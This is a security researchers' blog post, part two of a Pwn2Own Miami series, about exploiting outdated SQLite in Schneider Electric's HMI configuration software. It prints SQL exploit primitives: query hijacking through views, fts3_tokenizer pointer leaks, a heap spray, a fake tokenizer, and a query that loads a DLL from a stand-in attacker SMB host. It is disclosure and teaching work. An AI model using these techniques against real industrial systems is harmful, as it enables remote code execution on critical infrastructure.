By Fredrik Østrem, Emil Sandstø and Cim Stordal
Welcome back to our three-part series on Pwn2Own Miami.
In our previous post, we gave a high-level overview of how we exploited a vulnerability in the Schneider Electric EcoStruxure Operator Terminal Expert, a human machine interface (HMI) configuration software, used to create and modify application for HMI products designed by Schneider Electric.
In this part, we’ll cover in depth how we used the fact that we controlled the database, and that Schneider Electric used an outdated version of SQLite, to create a fully working exploit chain. To do this research, we stood on the shoulders of giants, building on this recent blog post by Omer Gull at Check Point Research.
What Is SQLite?
SQLite is a relational database that is meant to be embedded with the software. This is in contrast to well-known relational databases such as MySQL or PostgreSQL, which have a client-server architecture. SQLite comes pre-installed on both iOS and Android, and it’s also used by Google Chrome for implementing WebSQL.
The specific version of SQLite that we targeted and that was used by Schneider Electric was 18.104.22.168. You can download the source code here. We will throughout this article reference structures and functions from that code, so feel free to download it to follow along.
A SQLite database file stores the schema and data for tables in the database. A database table might look something like this:
sqlite> CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT);
The application gets the data from table with a query like this one:
sqlite> SELECT * FROM customers;
However, we needed the application to run a different query that we controlled to run our exploit. The way we did this was to use database views, which are dynamically generated tables based on a SELECT query. In the database file, we replaced the CREATE TABLE statement seen above with a CREATE VIEW statement containing our own query:
sqlite> CREATE VIEW customers AS SELECT datetime();
When the application then attempted to query the table, SQLite ran the view’s query and used it to build a dynamic table instead of reading data from the database file. This made it possible to hijack any query against a table in the database, as long as we knew the name of the table. For instance, in this case we called the datetime() function, which gave the timestamp at the time the query was made:
sqlite> SELECT * FROM customers;
In their exploit, Check Point Research performed data definition language (DDL) patching when changing these queries. We were uncertain about why that would be necessary, and as a result we didn’t do it.
The first primitive we needed was a way to corrupt memory, so we could turn it into code execution. Because Schneider Electric was using an outdated version of SQLite, we had a few primitives to choose from.
We ended up looking at CVE-2015–7036, an untrusted pointer dereference bug in fts3_tokenizer.
FTS3 is a Full-Text Search Module in SQLite allowing users to do effective searches by creating FTS tables. FTS tables are special tables with a built-in full-text index. The tokenizer itself is a ruleset for how to extract tokens. The fts3_tokenizer functions makes it possible to get and set tokenizers for the FTS3 module. Fortunately for us, this is done with raw pointers prior to SQLite version 3.11.0, and it’s exposed to SQL code as SQL blobs without any validation.
We took advantage of this twice: First to leak the address of the built-in simple tokenizer, then to replace the built-in porter tokenizer with our own, malicious tokenizer that we used to call a function pointer of our choice.
To get the address of the “simple” tokenizer, we simply called fts3_tokenizer with the tokenizer name (and wraped it in hex for pretty printing):
sqlite> SELECT hex(fts3_tokenizer(‘simple’));
And to replace the “porter” tokenizer with our own tokenizer, we called fts3_tokenizer with the address of the new tokenizer as the second argument:
sqlite> SELECT hex(fts3_tokenizer(‘porter’, x’4141414141414141'));
To make use of this, we needed to build our own tokenizer structure and store it somewhere on the heap at a known address. We also needed to create a virtual table trigger with FTS3 so that we could later trigger our custom tokenizer once we used a ‘MATCH’ expression on this table.
sqlite> CREATE VIRTUAL TABLE trigger USING FTS3(col, tokenizer=’porter’);
sqlite> INSERT INTO trigger VALUES(“haha”);
Selecting a Plan for Code Execution
If we look at the sqlite3_tokenizer_module structure in the SQLite source code, we can see this structure:
As you can tell, the tokenizer structure contains multiple function pointers. Check Point Research seems to primarily have targeted the xCreate(). That makes sense, as it is the first function that is being executed. We chose to target xOpen() instead, as that gave us full control of the second argument at execution time using the MATCH operator. For the xCreate() function, we reused the simpleCreate() function that the simple tokenizer uses to avoid crashing before xOpen() could be called. With it, we wanted to be able to run our own code.
FTS3 uses the MATCH operator to perform full-text search using the tokenizer, and calls the xOpen method of our tokenizer with its right operand:
sqlite> SELECT col FROM trigger WHERE col MATCH ‘controlleddata’
The controlled data ends up as the second argument to xOpen(). This meant that if there was a function that would just magically give us code execution by calling it with the right second argument and ignoring all others, we had won.
In SQLite exploitation literature, one method that keeps coming up is to “just use the SQLite’s load_extension function,” which allows you to load arbitrary DLL files as SQLite extensions. However, we couldn’t do this directly, since it first had to be enabled from the host application by calling the C function sqlite3_enable_load_extension. Instead, we saw that the load_extension function only checked that it has been enabled, and then called the winDlOpen function (on Windows platforms) to actually open the DLL file.
Luckily for us, winDlOpen was the magical function that we were looking for, and it was compatible with the tokenizer’s xOpen function. We could call this function directly, thus skipping the check to see if extension loading was enabled in its entirety. Since we weren’t building for CYGWIN, we can put the first argument as unused. That was perfect for us, as we had no control over that argument.
Following the code flow some more, you can see that we ended up calling osLoadLibrary with our controlled string:
Since we set the xOpen method of our tokenizer to point to winDlOpen, that function would be called when we used the MATCH operator on a FTS3 table. By giving the DLL path on the right side of the MATCH operator, we were able to load that DLL into the current process:
sqlite> SELECT col FROM trigger WHERE col MATCH “C:\Path\To\Exploit.dll”;
Now that we had a plan for our attack, we knew what primitives we needed:
- a way to leak the image base address, because we had to find the real simpleCreate() function to add to our fake tokenizer.
- the address to winDlOpen().
- a heap info leak to be able to find the location of our fake tokenizer.
Since we wrote this exploit as a SQLite query, we needed to craft some SQLite primitives in order to do basic arithmetic and heap spraying. Thankfully many of these primitives can be borrowed from our friends at Check Point Research.
Leaking the Image Address
Because we were crafting a fake object, we needed to leak the image base to find winDlOpen() and the simpleCreate() function so that our fake tokenizer would live long enough to reach the code that calls xOpen().
To do so, we used CVE-2015–7036. This is a vulnerability that, in a nutshell, will just give you the address of the tokenizer if you ask for it, due to how SQLite used to handle pointer passing interfaces. For more information on pointer passing, see the SQLite website.
To calculate the address of the necessary functions, we needed to leak any address in the base image. Our approach was:
sqlite> CREATE VIEW tokenizer_leak_raw AS SELECT hex(fts3_tokenizer(‘simple’)) as col;
Here, CREATE VIEW gets the hex address to the simple tokenizer. With that address we could simply calculate the offset to winDlOpen and simpleCreate. fts3_tokenizer returns the address of the registered tokenizer as a BLOB, querying the built-in tokenizers can leak the base address (in little-endian) of sqlite module.
Getting the Address of SQLite C Functions
Once we knew the address of the “simple” tokenizer module in the SQLite library image, we used pointer arithmetic to get the addresses of C functions in the library that had known static offsets.
Pointer arithmetic like this is a bit tricky, but it works like this:
- Start with a pointer stored as a blob in little-endian
- Convert to a hex string
- Flip the hex representation pairwise so that it’s in big-endian order
- Convert this to an integer
- Add the known offset of our target function address relative to the “simple” tokenizer module
- Convert back to a blob in little endian order
To do this effectively, we used a technique called “query-oriented programming,” or QOP, a term coined by Check Point Research. This pretty much just means that our exploitation primitives are implemented in SQL queries. All of the techniques we used for pointer arithmetic originate from Check Point Research.
Little-endian to big-endian and vice versa
We implemented a function called Flip that flips endians.
Pointer to integer and integer to pointer
We used the Pack64() and Unpack64() functions to convert pointers to and from integers.
Addition and subtraction
In order to do math, i.e. to subtract an offset from a leaked pointer to find a base address, we used MathWithConst().
We used these steps to get the addresses of the SQLite C functions simpleCreate and winDlOpen, which were needed at a later step in the process.
Building a Fake Tokenizer
let us replace a built-in tokenizer, “porter,” with our own pointed to by ptr. Here we set ptr to the address we would leak in our heap info leak, where we will have allocated a fake object.
Using QOP, we constructed a fake tokenizer shown in the image above:
- Set xCreate to the pointer of the simpleCreate function. This can be pointing to any function, which doesn’t crash SQLite.
- Set xOpen to the pointer of the winDlOpen function. This is what we will use to load our DLL.
- The other fields can contain arbitrary data, as they will not be used before we gain code execution. We also need to pad it with additional data at the end to ensure that we get the correct allocation size.
If you look at the code below, you’ll see that this is actually what we’re doing.
Leaking Heap Info
To leak a heap address, we used CVE-2017–6991.
sqlite> CREATE VIRTUAL TABLE leak_table USING FTS3(col);
sqlite> INSERT INTO leak_table VALUES(“haha”);
sqlite> CREATE VIEW raw_heap_leak AS SELECT leak_table AS col FROM leak_table;
sqlite> SELECT hex(col) FROM raw_heap_leak;
This bug is the same underlying design bug as our image base leak. It ends up giving us a pointer to a FTS3 cursor structure allocated on the heap inside a 144-byte region. For more information, see this presentation.
After reading the pointer, the object will immediately be freed and end up on the freelist. To win, we needed to reuse the same heap allocation when allocating our fake tokenizer. This enabled us to know the pointer to our fake object. In the example above, the address we leaked was 0x4040. To craft our fake sqlite3_tokenizer_module structure and fit it inside this allocation, we needed less than 144 bytes. The sqlite3_tokenizer_module is a simple structure, meaning a structure not linking to another structure. This was perfect for us. To make sure we ended up reusing the same allocation, we did a heap spray.
You don’t really need to know a whole lot about the Windows heap to perform a heap spray, just that Windows keeps a separate freelist for allocations of different sizes. For allocations up to 0x400 bytes, these buckets are 16-byte aligned.
By leaking the address of an object and freeing it, we can later attempt to allocate a new object with the same size. If we allocate all objects from the freelist, we will most likely allocate an object at the address where we leaked an address — unless someone else allocates the object before us. In the example below, you’ll see we eventually managed to reallocate 0x4040, the memory location we leaked in our heap info leak example.
In our exploit chain, we called our heap spray function, allocating HEAP_SPRAY_COUNT=128 entries. We tried to allocate all the available elements of the freelist of our size and replace it with our fake object.
Single Query Environment
Even though we had a known exploit documented by multiple researches, we couldn’t apply their methods directly. This is often the case when you have a library bug, as the environment around it matters.
Our issue was that the target made a new database connection for each select statement, and because the tokenizer state and other factors are not persistent between connections, we had to rely on a single select query. However, SQLite will normally start off by preparing all tables referenced in a select statement before executing it. Part of preparing an FTS3 table is retrieving the pointer to the specified tokenizer. However, we would have to first run a select statement to set the pointer of the tokenizer (see FTS3 Primitive) to our own tokenizer. We therefore had to figure out a way to prepare an FTS3 table after we had overridden the tokenizer.
When creating a FTS3 table, SQLite also creates something called shadow tables, which are used internally by FTS3. Fortunately for us, we found that SQLite allows hijacking of those shadow tables, similar to the query hijack technique. Shadow tables are queried as separate queries internally, which gave us a solution for running multiple queries triggered by one query.
Loading Our DLL File
Once we were able to load DLL files, we needed to be able to load our DLL file. The biggest problem here was that the only files we were able to control were those found in the project file that we loaded initially, and that file was, to the best of our knowledge, unpacked at an arbitrary path unknown to us. We only had one shot at loading the DLL file before the application crashed, so we couldn’t just guess the file name.
Instead, we took advantage of the fact that Windows allows DLL files to be loaded from network drives — even drives that are not mounted. By setting up an SMB2 server that hosted our exploit DLL, we could use the network path of that DLL file to load it over the network from a machine that we controlled:
sqlite> SELECT col FROM trigger WHERE col MATCH ‘\\our-evil-machine.example.com\share\dll\exploit-dll.dll’;
You can see that this was exactly what we did in the QOP code. First we set exploitDllPath to our file path:
And then we eventually used it when selecting from trigger:
Putting It All Together
Finally, we had all the parts needed for our exploit. Now we just needed to trick the application into running our malicious SQLite code. The application will perform SELECT queries on known tables when a file is loaded, so we could replace those tables with views to hijack the query and run our own query instead:
sqlite> DROP TABLE some_table;
sqlite> CREATE VIEW some_table AS SELECT exploit_query;
However, we still had a couple of problems. First of all, the application only does one SELECT statement before asking for a new connection, so we needed three things to happen in a single connection:
- Replace the “porter” tokenizer with a pointer to our own tokenizer.
- Heap spray our tokenizer data so that the pointer would point to the tokenizer.
- Trigger the tokenizer.
This was easily solved by just “adding” each step in a query, and creating new views for more complex steps:
sqlite> CREATE VIEW raw_heap_leak AS …;
sqlite> CREATE VIEW heap_spray AS …;
sqlite> CREATE VIEW some_table AS SELECT (
(SELECT fts3_tokenizer(‘porter’, (SELECT col FROM raw_heap_leak)))
+ (SELECT * FROM heap_spray)
+ (SELECT col FROM trigger WHERE col MATCH ‘exploit-dll.dll’));
The last select statement above will not work as expected, since as mentioned in Single Query Environment, when an FTS3 virtual table (such as trigger) is found in a SELECT statement, the table and its tokenizer are initialized before the query is executed. However, we were replacing the tokenizer inside the query, so we weren’t able to use this to trigger our own malicious tokenizer. To work around this, we moved the trigger logic into a separate virtual table, and hijacked one of the shadow tables of the virtual table called `[yourtablename]_content` table:
sqlite> CREATE VIRTUAL TABLE target USING FTS3(col);
sqlite> DROP TABLE target_content;
sqlite> CREATE VIEW target_content AS SELECT 0 AS docid, (SELECT col FROM trigger WHERE col MATCH ‘exploit-dll.dll’);sqlite> CREATE VIEW some_table AS SELECT (
(SELECT fts3_tokenizer(‘porter’, (SELECT col FROM raw_heap_leak)))
+ (SELECT * FROM heap_spray)
+ (SELECT col FROM target);
The simpler way
If you want to exploit this vulnerability in a simpler and more reliable way, just take a look at what Steven and Chris did. They published a good blogpost about this. It turns out our assumption about “load_extension” being disabled, was wrong. And one could just directly call load_extension and never have to do any memory corruption exploitation.
Building upon prior research, we have shown how easy one can write reliable exploits targeting SQLlite, and as a result how important it is to keep dependencies up to date. Further we have demonstrated the dangers of loading untrusted database files.
Stay tuned for part three, in which we’ll explain the privilege escalation.
Want to Learn More?
We’ll be presenting our research on industrial control system product security at Ignite 2020, Europe’s largest conference dedicated to industrial digitalization, on June 10–11 in Oslo, Norway. We hope to see you there!
To learn more about Ignite, go to: https://www.cogniteignite.com/